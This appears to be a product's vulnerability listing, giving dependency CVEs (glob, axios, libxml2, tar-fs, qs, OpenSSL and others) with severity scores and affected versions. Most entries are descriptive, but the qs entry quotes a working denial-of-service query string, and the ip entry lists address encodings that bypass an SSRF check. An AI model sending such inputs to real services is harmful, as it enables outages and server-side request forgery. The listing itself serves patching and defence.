    CVE-2025-64756Glob matches files using patterns the shell uses. Starting in version 10.2.0 and prior to versions 10.5.0 and 11.1.0, the glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> are used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges. This issue has been patched in versions 10.5.0 and 11.1.0.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.2.0
    • 9.1.6
    • 9.1.5
    • 9.1.4
    • 9.1.3
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-59375libexpat in Expat before 2.7.2 allows attackers to trigger large dynamic memory allocations via a small document that is submitted for parsing.HIGH

    NVD: n/a

    RedHat: 5.3

    • 9.2.1
    • 9.2.0
    • 9.1.7
    • 9.1.6
    • 9.1.5
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-6965There exists a vulnerability in SQLite versions before 3.50.2 where the number of aggregate terms could exceed the number of columns available. This could lead to a memory corruption issue. We recommend upgrading to version 3.50.2 or above.HIGH

    NVD: 9.8

    RedHat: 7.7

    • 9.2.1
    • 9.2.0
    • 9.1.7
    • 9.1.6
    • 9.1.5
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-59343tar-fs provides filesystem bindings for tar-stream. Versions prior to 3.1.1, 2.1.3, and 1.16.5 are vulnerable to symlink validation bypass if the destination directory is predictable with a specific tarball. This issue has been patched in version 3.1.1, 2.1.4, and 1.16.6. A workaround involves using the ignore option on non files/directories.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.1.4
    • 9.1.3
    • 9.1.2
    • 9.1.1
    • 9.1.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-58754Axios is a promise based HTTP client for the browser and Node.js. When Axios starting in version 0.28.0 and prior to versions 0.30.2 and 1.12.0 runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response. This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`. Versions 0.30.2 and 1.12.0 contain a patch for the issue.HIGH

    NVD: n/a

    RedHat: 5.3

    • 9.1.3
    • 9.1.2
    • 9.1.1
    • 9.1.0
    • 9.0.7
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-5914A vulnerability has been identified in the libarchive library, specifically within the archive_read_format_rar_seek_data() function. This flaw involves an integer overflow that can ultimately lead to a double-free condition. Exploiting a double-free vulnerability can result in memory corruption, enabling an attacker to execute arbitrary code or cause a denial-of-service condition.HIGH

    NVD: 7.8

    RedHat: 7.8

    • 9.1.2
    • 9.1.1
    • 9.1.0
    • 9.0.5
    • 9.0.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-7425A flaw was found in libxslt where the attribute type, atype, flags are modified in a way that corrupts internal memory management. When XSLT functions, such as the key() process, result in tree fragments, this corruption prevents the proper cleanup of ID attributes. As a result, the system may access freed memory, causing crashes or enabling attackers to trigger heap corruption.HIGH

    NVD: n/a

    RedHat: 7.8

    • 9.1.0
    • 9.0.4
    • 9.0.3
    • 9.0.2
    • 9.0.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-49794A use-after-free vulnerability was found in libxml2. This issue occurs when parsing XPath elements under certain circumstances when the XML schematron has the <sch:name path="..."/> schema elements. This flaw allows a malicious actor to craft a malicious XML document used as input for libxml, resulting in the program's crash using libxml or other possible undefined behaviors.HIGH

    NVD: n/a

    RedHat: 9.1

    • 9.0.3
    • 9.0.2
    • 9.0.1
    • 9.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-49796A vulnerability was found in libxml2. Processing certain sch:name elements from the input XML file can trigger a memory corruption issue. This flaw allows an attacker to craft a malicious XML input file that can lead libxml to crash, resulting in a denial of service or other possible undefined behavior due to sensitive data being corrupted in memory.HIGH

    NVD: n/a

    RedHat: 9.1

    • 9.0.3
    • 9.0.2
    • 9.0.1
    • 9.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-12718Allows modifying some file metadata (e.g. last modified) with filter="data" or file permissions (chmod) with filter="tar" of files outside the extraction directory. You are affected by this vulnerability if using the tarfile module to extract untrusted tar archives using TarFile.extractall() or TarFile.extract() using the filter= parameter with a value of "data" or "tar". See the tarfile extraction filters documentation https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter  for more information. Only Python versions 3.12 or later are affected by these vulnerabilities, earlier versions don't include the extraction filter feature. Note that for Python 3.14 or later the default value of filter= changed from "no filtering" to `"data", so if you are relying on this new default behavior then your usage is also affected. Note that none of these vulnerabilities significantly affect the installation of source distributions which are tar archives as source distributions already allow arbitrary code execution during the build process. However when evaluating source distributions it's important to avoid installing source distributions with suspicious links.HIGH

    NVD: n/a

    RedHat: 7.6

    • 9.0.3
    • 9.0.2
    • 9.0.1
    • 9.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-4138Allows the extraction filter to be ignored, allowing symlink targets to point outside the destination directory, and the modification of some file metadata. You are affected by this vulnerability if using the tarfile module to extract untrusted tar archives using TarFile.extractall() or TarFile.extract() using the filter= parameter with a value of "data" or "tar". See the tarfile extraction filters documentation https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter  for more information. Note that for Python 3.14 or later the default value of filter= changed from "no filtering" to `"data", so if you are relying on this new default behavior then your usage is also affected. Note that none of these vulnerabilities significantly affect the installation of source distributions which are tar archives as source distributions already allow arbitrary code execution during the build process. However when evaluating source distributions it's important to avoid installing source distributions with suspicious links.HIGH

    NVD: n/a

    RedHat: 7.5

    • 9.0.3
    • 9.0.2
    • 9.0.1
    • 9.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-4517Allows arbitrary filesystem writes outside the extraction directory during extraction with filter="data". You are affected by this vulnerability if using the tarfile module to extract untrusted tar archives using TarFile.extractall() or TarFile.extract() using the filter= parameter with a value of "data" or "tar". See the tarfile extraction filters documentation https://docs.python.org/3/library/tarfile.html#tarfile-extraction-filter  for more information. Note that for Python 3.14 or later the default value of filter= changed from "no filtering" to `"data", so if you are relying on this new default behavior then your usage is also affected. Note that none of these vulnerabilities significantly affect the installation of source distributions which are tar archives as source distributions already allow arbitrary code execution during the build process. However when evaluating source distributions it's important to avoid installing source distributions with suspicious links.HIGH

    NVD: n/a

    RedHat: 7.6

    • 9.0.3
    • 9.0.2
    • 9.0.1
    • 9.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-48387tar-fs provides filesystem bindings for tar-stream. Versions prior to 3.0.9, 2.1.3, and 1.16.5 have an issue where an extract can write outside the specified dir with a specific tarball. This has been patched in versions 3.0.9, 2.1.3, and 1.16.5. As a workaround, use the ignore option to ignore non files/directories.HIGH

    NVD: n/a

    RedHat: 7.3

    • 9.0.2
    • 9.0.1
    • 9.0.0
    • 8.18.2
    • 8.18.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-47934OpenPGP.js is a JavaScript implementation of the OpenPGP protocol. Startinf in version 5.0.1 and prior to versions 5.11.3 and 6.1.1, a maliciously modified message can be passed to either `openpgp.verify` or `openpgp.decrypt`, causing these functions to return a valid signature verification result while returning data that was not actually signed. This flaw allows signature verifications of inline (non-detached) signed messages (using `openpgp.verify`) and signed-and-encrypted messages (using `openpgp.decrypt` with `verificationKeys`) to be spoofed, since both functions return extracted data that may not match the data that was originally signed. Detached signature verifications are not affected, as no signed data is returned in that case. In order to spoof a message, the attacker needs a single valid message signature (inline or detached) as well as the plaintext data that was legitimately signed, and can then construct an inline-signed message or signed-and-encrypted message with any data of the attacker's choice, which will appear as legitimately signed by affected versions of OpenPGP.js. In other words, any inline-signed message can be modified to return any other data (while still indicating that the signature was valid), and the same is true for signed+encrypted messages if the attacker can obtain a valid signature and encrypt a new message (of the attacker's choice) together with that signature. The issue has been patched in versions 5.11.3 and 6.1.1. Some workarounds are available. When verifying inline-signed messages, extract the message and signature(s) from the message returned by `openpgp.readMessage`, and verify the(/each) signature as a detached signature by passing the signature and a new message containing only the data (created using `openpgp.createMessage`) to `openpgp.verify`. When decrypting and verifying signed+encrypted messages, decrypt and verify the message in two steps, by first calling `openpgp.decrypt` without `verificationKeys`, and then passing the returned signature(s) and a new message containing the decrypted data (created using `openpgp.createMessage`) to `openpgp.verify`.HIGH

    NVD: n/a

    RedHat: n/a

    • 9.0.1
    • 9.0.0
    • 8.18.2
    • 8.18.1
    • 8.18.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-12905An Improper Link Resolution Before File Access ("Link Following") and Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal"). This vulnerability occurs when extracting a maliciously crafted tar file, which can result in unauthorized file writes or overwrites outside the intended extraction directory. The issue is associated with index.js in the tar-fs package. This issue affects tar-fs: from 0.0.0 before 1.16.4, from 2.0.0 before 2.1.2, from 3.0.0 before 3.0.8.HIGH

    NVD: n/a

    RedHat: 7.5

    • 8.17.4
    • 8.17.3
    • 8.17.2
    • 8.17.1
    • 8.17.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-21538Versions of the package cross-spawn before 6.0.6, from 7.0.0 and before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.HIGH

    NVD: n/a

    RedHat: 4.4

    • 8.17.0
    • 8.16.6
    • 8.16.5
    • 8.16.4
    • 8.16.3
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-27152axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.HIGH

    NVD: 5.3

    RedHat: 5.3

    • 8.17.3
    • 8.17.2
    • 8.17.1
    • 8.17.0
    • 8.16.5
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-29415The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.HIGH

    NVD: n/a

    RedHat: 9.8

    • 8.17.2
    • 8.17.1
    • 8.17.0
    • 8.16.4
    • 8.16.3
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-4367A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.HIGH

    NVD: 8.8

    RedHat: 7.5

    • 8.15.5
    • 8.15.4
    • 8.15.3
    • 8.15.2
    • 8.15.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-45296path-to-regexp turns path strings into a regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a DoS. The bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (.). For users of 0.1, upgrade to 0.1.10. All other users should upgrade to 8.0.0.HIGH

    NVD: n/a

    RedHat: 5.3

    • 8.15.1
    • 8.15.0
    • 8.14.3
    • 8.14.2
    • 8.14.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-39338axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.15.0
    • 8.14.3
    • 8.14.2
    • 8.14.1
    • 8.14.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-37890ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.HIGH

    NVD: n/a

    RedHat: 5.9

    • 8.14.3
    • 8.14.2
    • 8.14.1
    • 8.14.0
    • 8.13.4
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2024-4068The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to Memory Exhaustion. In `lib/parse.js,` if a malicious user sends "imbalanced braces" as input, the parsing will enter a loop, which will cause the program to start allocating heap memory without freeing it at any moment of the loop. Eventually, the JavaScript heap limit is reached, and the program will crash.HIGH

    NVD: n/a

    RedHat: 7.5

    • 8.14.1
    • 8.14.0
    • 8.13.4
    • 8.13.3
    • 8.13.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    GHSA-36jr-mh4h-2g58The d3-color module provides representations for various color spaces in the browser. Versions prior to 3.1.0 are vulnerable to a Regular expression Denial of Service. This issue has been patched in version 3.1.0. There are no known workarounds.HIGH

    NVD: n/a

    RedHat: n/a

    • 8.14.0
    • 8.13.4
    • 8.13.3
    • 8.13.2
    • 8.13.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.11.1
    • 8.11.0
    • 8.10.4
    • 8.10.3
    • 8.10.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-25883Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.9.1
    • 8.9.0
    • 8.8.2
    • 8.8.1
    • 8.8.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2023-25653node-jose is a JavaScript implementation of the JSON Object Signing and Encryption (JOSE) for web browsers and node.js-based servers. Prior to version 2.2.0, when using the non-default "fallback" crypto back-end, ECC operations in `node-jose` can trigger a Denial-of-Service (DoS) condition, due to a possible infinite loop in an internal calculation. For some ECC operations, this condition is triggered randomly; for others, it can be triggered by malicious input. The issue has been patched in version 2.2.0. Since this issue is only present in the "fallback" crypto implementation, it can be avoided by ensuring that either WebCrypto or the Node `crypto` module is available in the JS environment where `node-jose` is being run.HIGH

    NVD: 7.5

    RedHat: n/a

    • 8.9.0
    • 8.8.2
    • 8.8.1
    • 8.8.0
    • 8.7.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-25881This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.6.2
    • 8.6.1
    • 8.6.0
    • 8.5.3
    • 8.5.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2023-24807Undici is an HTTP/1.1 client for Node.js. Prior to version 5.19.1, the `Headers.set()` and `Headers.append()` methods are vulnerable to Regular Expression Denial of Service (ReDoS) attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normalize the values in the `headerValueNormalize()` utility function. This vulnerability was patched in v5.19.1. No known workarounds are available.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.6.2
    • 8.6.1
    • 8.6.0
    • 8.5.3
    • 8.5.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2023-0286There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.HIGH

    NVD: 7.4

    RedHat: 7.4

    • 8.6.1
    • 8.6.0
    • 8.5.3
    • 8.5.2
    • 8.5.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-23539Versions `<=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions.HIGH

    NVD: 8.1

    RedHat: 8.1

    • 8.6.1
    • 8.6.0
    • 8.5.3
    • 8.5.2
    • 8.5.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-38900decode-uri-component 0.2.0 is vulnerable to Improper Input Validation resulting in DoS.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.6.0
    • 8.5.3
    • 8.5.2
    • 8.5.1
    • 8.5.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2023-22467Luxon is a library for working with dates and times in JavaScript. On the 1.x branch prior to 1.38.1, the 2.x branch prior to 2.5.2, and the 3.x branch on 3.2.1, Luxon's `DateTime.fromRFC2822() has quadratic (N^2) complexity on some specific inputs. This causes a noticeable slowdown for inputs with lengths above 10k characters. Users providing untrusted data to this method are therefore vulnerable to (Re)DoS attacks. This issue also appears in Moment as CVE-2022-31129. Versions 1.38.1, 2.5.2, and 3.2.1 contain patches for this issue. As a workaround, limit the length of the input.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.6.0
    • 8.5.3
    • 8.5.2
    • 8.5.1
    • 8.5.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-46175JSON5 is an extension to the popular JSON file format that aims to be easier to write and maintain by hand (e.g. for config files). The `parse` method of the JSON5 library before and including versions 1.0.1 and 2.2.1 does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object. This vulnerability pollutes the prototype of the object returned by `JSON5.parse` and not the global Object prototype, which is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations. This vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution. `JSON5.parse` should restrict parsing of `__proto__` keys when parsing JSON strings to objects. As a point of reference, the `JSON.parse` method included in JavaScript ignores `__proto__` keys. Simply changing `JSON5.parse` to `JSON.parse` in the examples above mitigates this vulnerability. This vulnerability is patched in json5 versions 1.0.2, 2.2.2, and later.HIGH

    NVD: 8.8

    RedHat: 8.8

    • 8.3.3
    • 8.3.2
    • 8.3.1
    • 8.3.0
    • 8.2.3
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-37599A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the resourcePath variable in interpolateName.js.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.3.3
    • 8.3.2
    • 8.3.1
    • 8.3.0
    • 8.2.3
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-37603A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the url variable in interpolateName.js.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.3.3
    • 8.3.2
    • 8.3.1
    • 8.3.0
    • 8.2.3
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-31129moment is a JavaScript date library for parsing, validating, manipulating, and formatting dates. Affected versions of moment were found to use an inefficient parsing algorithm. Specifically using string-to-date parsing in moment (more specifically rfc2822 parsing, which is tried by default) has quadratic (N^2) complexity on specific inputs. Users may notice a noticeable slowdown is observed with inputs above 10k characters. Users who pass user-provided strings without sanity length checks to moment constructor are vulnerable to (Re)DoS attacks. The problem is patched in 2.29.4, the patch can be applied to all affected versions with minimal tweaking. Users are advised to upgrade. Users unable to upgrade should consider limiting date lengths accepted from user input.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.3.2
    • 8.3.1
    • 8.3.0
    • 8.2.3
    • 8.2.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-32210`Undici.ProxyAgent` never verifies the remote server's certificate, and always exposes all request & response data to the proxy. This unexpectedly means that proxies can MitM all HTTPS traffic, and if the proxy's URL is HTTP then it also means that nominally HTTPS requests are actually sent via plain-text HTTP between Undici and the proxy server.HIGH

    NVD: 6.5

    RedHat: n/a

    • 8.3.2
    • 8.3.1
    • 8.3.0
    • 8.2.3
    • 8.2.2
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2021-3749axios is vulnerable to Inefficient Regular Expression ComplexityHIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.2.3
    • 8.2.2
    • 8.2.1
    • 8.2.0
    • 8.1.3
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-3517A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.1.3
    • 8.1.2
    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2021-43138In Async before 2.6.4 and 3.x before 3.2.2, a malicious user can obtain privileges via the mapValues() method, aka lib/internal/iterator.js createObjectIterator prototype pollution.HIGH

    NVD: 7.8

    RedHat: 7.8

    • 8.1.2
    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-24785Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing it to Moment.js.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.1.2
    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-24999qs before 6.10.3, as used in Express before 4.17.3 and other products, allows attackers to cause a Node process hang for an Express application because an __ proto__ key can be used. In many typical Express use cases, an unauthenticated remote attacker can place the attack payload in the query string of the URL that is used to visit the application, such as a[__proto__]=b&a[__proto__]&a[length]=100000000. The fix was backported to qs 6.9.7, 6.8.3, 6.7.3, 6.6.1, 6.5.3, 6.4.1, 6.3.3, and 6.2.4 (and therefore Express 4.17.3, which has "deps: qs@6.9.7" in its release description, is not vulnerable).HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.1.2
    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2025-59840Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. In Vega prior to version 6.2.0, applications meeting 2 conditions are at risk of arbitrary JavaScript code execution, even if "safe mode" expressionInterpreter is used. They are vulnerable if they use `vega` in an application that attaches `vega` library and a `vega.View` instance similar to the Vega Editor to the global `window` and if they allow user-defined Vega `JSON` definitions (vs JSON that was is only provided through source code). Patches are available in the following Vega applications. If using the latest Vega line (6.x), upgrade to `vega` `6.2.0` / `vega-expression` `6.1.0` / `vega-interpreter` `2.2.1` (if using AST evaluator mode). If using Vega in a non-ESM environment, upgrade to `vega-expression` `5.2.1` / `1.2.1` (if using AST evaluator mode). Some workarounds are available. Do not attach `vega` View instances to global variables, and do not attach `vega` to the global window. These practices of attaching the vega library and View instances may be convenient for debugging, but should not be used in production or in any situation where vega/vega-lite definitions could be provided by untrusted parties.HIGH

    NVD: n/a

    RedHat: 8.1

    • 8.1.2
    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2020-8203Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.HIGH

    NVD: 7.4

    RedHat: 7.4

    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2021-23337Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.HIGH

    NVD: 7.2

    RedHat: 7.2

    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-24771Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-24772Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.1.1
    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
    CVE-2022-0778The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).HIGH

    NVD: 7.5

    RedHat: 7.5

    • 8.1.0
    • 8.0.1
    • 8.0.0
    • 9.4.0
    • 9.3.4
    • 9.3.3
    • 9.3.2
    • 9.3.1
